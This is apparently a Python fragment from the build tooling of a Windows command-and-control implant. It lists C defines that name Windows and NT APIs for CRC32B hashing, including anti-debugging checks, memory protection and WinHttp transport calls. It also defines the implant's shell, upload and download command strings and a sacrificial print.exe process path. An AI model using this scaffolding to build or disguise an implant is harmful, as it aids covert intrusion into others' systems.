plain_function_strings = [
    "#define CheckRemoteDebuggerPresent_CRC32B      \"CheckRemoteDebuggerPresent\"",
    "#define CreateFileW_CRC32B                     \"CreateFileW\"",
    "#define DeviceIoControl_CRC32B                 \"DeviceIoControl\"",
    "#define GetAdaptersInfo_CRC32B                 \"GetAdaptersInfo\"",
    "#define GetComputerNameExA_CRC32B              \"GetComputerNameExA\"",
    "#define GetCurrentProcessId_CRC32B             \"GetCurrentProcessId\"",
    "#define GetModuleFileNameA_CRC32B              \"GetModuleFileNameA\"",
    "#define GetNativeSystemInfo_CRC32B             \"GetNativeSystemInfo\"",
    "#define GetSystemInfo_CRC32B                   \"GetSystemInfo\"",
    "#define GetUserNameA_CRC32B                    \"GetUserNameA\"",
    "#define GlobalMemoryStatusEx_CRC32B            \"GlobalMemoryStatusEx\"",
    "#define IsDebuggerPresent_CRC32B               \"IsDebuggerPresent\"",
    "#define K32GetModuleInformation_CRC32B         \"K32GetModuleInformation\"",
    "#define LocalAlloc_CRC32B                      \"LocalAlloc\"",
    "#define LdrLoadDll_CRC32B                      \"LdrLoadDll\"",
    "#define LdrUnloadDll_CRC32B                    \"LdrUnloadDll\"",
    "#define NtAllocateVirtualMemory_CRC32B         \"NtAllocateVirtualMemory\"",
    "#define NtClose_CRC32B                         \"NtClose\"",
    "#define NtCreateFile_CRC32B                    \"NtCreateFile\"",
    "#define NtCreateProcessEx_CRC32B               \"NtCreateProcessEx\"",
    "#define NtCreateSection_CRC32B                 \"NtCreateSection\"",
    "#define NtCreateUserProcess_CRC32B             \"NtCreateUserProcess\"",
    "#define NtFreeVirtualMemory_CRC32B             \"NtFreeVirtualMemory\"",
    "#define NtOpenFile_CRC32B                      \"NtOpenFile\"",
    "#define NtProtectVirtualMemory_CRC32B          \"NtProtectVirtualMemory\"",
    "#define NtQueryInformationFile_CRC32B          \"NtQueryInformationFile\"",
    "#define NtReadFile_CRC32B                      \"NtReadFile\"",
    "#define NtReadVirtualMemory_CRC32B             \"NtReadVirtualMemory\"",
    "#define NtTerminateProcess_CRC32B              \"NtTerminateProcess\"",
    "#define NtWriteFile_CRC32B                     \"NtWriteFile\"",
    "#define ReadFile_CRC32B                        \"ReadFile\"",
    "#define RtlAllocateHeap_CRC32B                 \"RtlAllocateHeap\"",
    "#define RtlCreateProcessParametersEx_CBC32B    \"RtlCreateProcessParametersEx\"",
    "#define RtlDestroyProcessParameters_CRC32B     \"RtlDestroyProcessParameters\"",
    "#define RtlFreeHeap_CRC32B                     \"RtlFreeHeap\"",
    "#define RtlGetProcessHeaps_CRC32B              \"RtlGetProcessHeaps\"",
    "#define RtlGetVersion_CRC32B                   \"RtlGetVersion\"",
    "#define RtlInitUnicodeString_CRC32B            \"RtlInitUnicodeString\"",
    "#define RtlRandomEx_CRC32B                     \"RtlRandomEx\"",
    "#define VirtualAlloc_CRC32B                    \"VirtualAlloc\"",
    "#define VirtualProtect_CRC32B                  \"VirtualProtect\"",
    "#define WinHttpCloseHandle_CRC32B              \"WinHttpCloseHandle\"",
    "#define WinHttpConnect_CRC32B                  \"WinHttpConnect\"",
    "#define WinHttpOpen_CRC32B                     \"WinHttpOpen\"",
    "#define WinHttpOpenRequest_CRC32B              \"WinHttpOpenRequest\"",
    "#define WinHttpReadData_CRC32B                 \"WinHttpReadData\"",
    "#define WinHttpReceiveResponse_CRC32B          \"WinHttpReceiveResponse\"",
    "#define WinHttpSendRequest_CRC32B              \"WinHttpSendRequest\"",
    "#define WinHttpSetOption_CRC32B                \"WinHttpSetOption\"",

]

plain_strings = [
    "#define S_INSTANCE_NOT_CONNECTED \"instance not connected!\"",
    "#define S_COMMAND_NOT_FOUND      \"command not found\"",
    "#define S_IS_COMMAND_NO_JOB      \"is command no job\"",
    "#define S_TRANSPORT_FAILED       \"transport failed\"",
    "#define S_COMMAND_SHELL          \"command shell\"",
    "#define S_COMMAND_UPLOAD         \"command upload\"",
    "#define S_COMMAND_DOWNLOAD       \"command download\"",
    "#define S_COMMAND_EXIT           \"command exit\"",
    "#define S_NTDLL                  \"ntdll.dll\"",
    "#define S_WINHTTP                \"winhttp.dll\"",
    "#define S_KERNEL32               \"kernel32.dll\"",
    "#define S_ADVAPI32               \"advapi32.dll\"",
    "#define S_IPHLPAPI               \"iphlpapi.dll\"",
    "#define S_SACR_PROC              \"C:\\Windows\\System32\\print.exe\"",
    "#define S_MARKER_MASK            \"xxxxxxxxxxxxxxxxxxxxxxxx\""

]